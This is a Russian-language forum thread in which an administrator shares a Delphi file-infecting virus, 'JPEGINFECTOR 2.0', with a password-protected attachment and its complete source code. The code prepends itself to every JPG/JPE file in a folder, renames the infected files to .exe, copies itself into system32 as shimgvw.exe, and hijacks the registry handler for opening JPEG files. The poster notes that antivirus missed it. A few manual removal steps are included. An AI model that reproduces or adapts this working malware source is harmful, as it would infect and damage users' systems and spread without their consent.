• Привет !

    На форуме есть зеркало в ТОРе:rusfwz3cukdej7do.onion

    Обратная связь:info@ru-sfera.org

    Всего доброго !

Очень простенький вирус заражающий JPEG-файлы (1 Viewer)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 397
Репутация
7 885
Telegram
При запуске он ищет в текущем каталоге все файлы, имеющие расширения *.JPE
*.JPEG *.JPG, и записывается в их начало. После чего, переименовывает
заражённые файлы в *.EXE.
При открытии заражённого файла, вирус извлекает восстановленную картинку во
временный файл, и отображает её. После того, как пользователь закроет картинку,
временный файл уничтожается.
Кроме того, вирус так изменяет системный реестр, что при открытии
любого JPEG-файла будет происходить его заражение.
Таким образом, для полного заражения системы достаточно всего лишь одного
запуска вируса на компьютере!

Восстановление:

1) Удаляешь из папки Windows\system32 файл shimgvw.exe
2) Записываешь в ключ реестра HKEY_CLASSES_ROOT\jpegfile\shell\open\command
строку:
rundll32.exe C:\WINDOWS\system32\shimgvw.dll,ImageView_Fullscre en %1

Написан на делфи.

Пароль:111
 

Вложения

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 397
Репутация
7 885
Telegram
Avast IS 9 beta не отреагировал!!!
Что не красит Аваст!, вирус-то старенький, да и простенький, вот его исходник на делфи:

Код:
{
Исходник вируса JPEGINFECTOR 2.0 by Abaston.
Данный вирус является первым в мире полноценным вирусом, способным
распространяться через JPEG-файлы.
При запуске он ищет в текущем каталоге все файлы, имеющие расширения *.JPE
*.JPEG *.JPG, и записывается в их начало. После чего, переименовывает
заражённые файлы в *.EXE.
При открытии заражённого файла, вирус извлекает восстановленную картинку во
временный файл, и отображает её. После того, как пользователь закроет картинку,
временный файл уничтожается.
Кроме того, вирус так изменяет системный реестр, что при открытии
любого JPEG-файла будет происходить его заражение.
Таким образом, для полного заражения системы достаточно всего лишь одного
запуска вируса на компьютере!
}
 
program JPEGINFECTOR;
uses shellapi,sysutils,registry,windows;
const virsize=47104;	//длина вируса, запакованного UPX
var f1,f2:file;
nr,nw:longint;
reg:tregistry;
victims:tsearchrec;
buf:array[1..virsize] of byte;
 
{$R *.RES}
 
//определение пути к системной папке
function system32():string;
var len:uint;
buffer:string;
begin
setlength(buffer,max_path+1);
len:=getsystemdirectory(pchar(buffer),max_path);
setlength(buffer,len);
system32:=buffer;
end;
 
//процедура извлечения картинки во временный файл
procedure go;
begin
try
assignfile(f2,paramstr(0)+'.bmp');
rewrite(f2,1);
seek(f1,virsize);
repeat
filemode:=0;
blockread(f1,buf,virsize,nr);
filemode:=2;
blockwrite(f2,buf,nr,nw);
until (nr=0) or (nw<>nr);
closefile(f1);
closefile(f2);
shellexecute(0,'open',pchar(paramstr(0)+'.bmp'),nil,nil,sw_show);
sleep(1000);
deletefile(pchar(paramstr(0)+'.bmp'));
except
end;
end;
 
//процедура заражения файлов в текущем каталоге
procedure infect(victim:string);
begin
try
assignfile(f1,victim);
rename(f1,'fuck');
filemode:=0;
assignfile(f2,paramstr(0));
reset(f2,1);
blockread(f2,buf,virsize);
filemode:=2;
closefile(f2);
assignfile(f1,victim);
rewrite(f1,1);
blockwrite(f1,buf,virsize);
assignfile(f2,'fuck');
reset(f2,1);
repeat
blockread(f2,buf,virsize,nr);
blockwrite(f1,buf,nr,nw);
until (nr=0) or (nw<>nr);
closefile(f1);
closefile(f2);
deletefile(pchar('fuck'));
except
end;
end;
 
begin
filemode:=0;
//проверяем наличие копии вируса по адресу Windows\system32\shimgvw.exe
if findfirst(system32+'\shimgvw.exe',faanyfile,victims)<>0 then
begin
//создаём копию
assignfile(f1,paramstr(0));
reset(f1,1);
blockread(f1,buf,virsize);
closefile(f1);
assignfile(f2,system32+'\shimgvw.exe');
rewrite(f2,1);
blockwrite(f2,buf,virsize);
closefile(f2);
//записываем копию в реестр
reg:=tregistry.create();
reg.rootkey:=HKEY_CLASSES_ROOT;
reg.deletekey('jpegfile\shell\open');
if reg.openkey('jpegfile\shell\open\command',true) then
begin
reg.writestring('','"'+system32+'\shimgvw.exe"'+' "%1"');
reg.closekey();
end;
reg.free();
end;
try
assignfile(f1,paramstr(0));
reset(f1,1);
filemode:=2;
//восстанавливаем заражённую картинку
if filesize(f1)>virsize then go;
closefile(f1);
except
end;
//если запущен дроппер вируса, отображаем JPEG-файл
if paramcount>0 then
begin
renamefile(paramstr(1),paramstr(1)+'.bmp');
shellexecute(0,'open',pchar(paramstr(1)+'.bmp'),nil,nil,sw_show);
sleep(1000);
renamefile(paramstr(1)+'.bmp',paramstr(1));
end;
//ищем и заражаем все JPE-файлы
if findfirst('*.jpe',faanyfile,victims)=0 then
repeat
infect(victims.name);
until findnext(victims)<>0;
//ищем и заражаем все JPG-файлы
if findfirst('*.jpg',faanyfile,victims)=0 then
repeat
infect(victims.name);
until findnext(victims)<>0;
//переименовываем все заражённые файлы в EXE
winexec(pchar('cmd.exe /c ren *.jpe *.exe'),sw_hide);
winexec(pchar('cmd.exe /c ren *.jpg *.exe'),sw_hide);
end.

Безымянный.png
 

Garo)

Уважаемый пользователь
Форумчанин
Регистрация
23.08.2013
Сообщения
94
Репутация
147
не плохо ) может у кого Нечта найдется ?xD недавно комп у чела смотрел более 1000 зараженых файлов
И самое интересное что переустановка 100% гарантии вам не даст , нужно все файлы которые хотите перенести на др винду проверять на вирус и если он найдется то лечить с помощью Live CD
1 файл пропустите и все начнется заново)))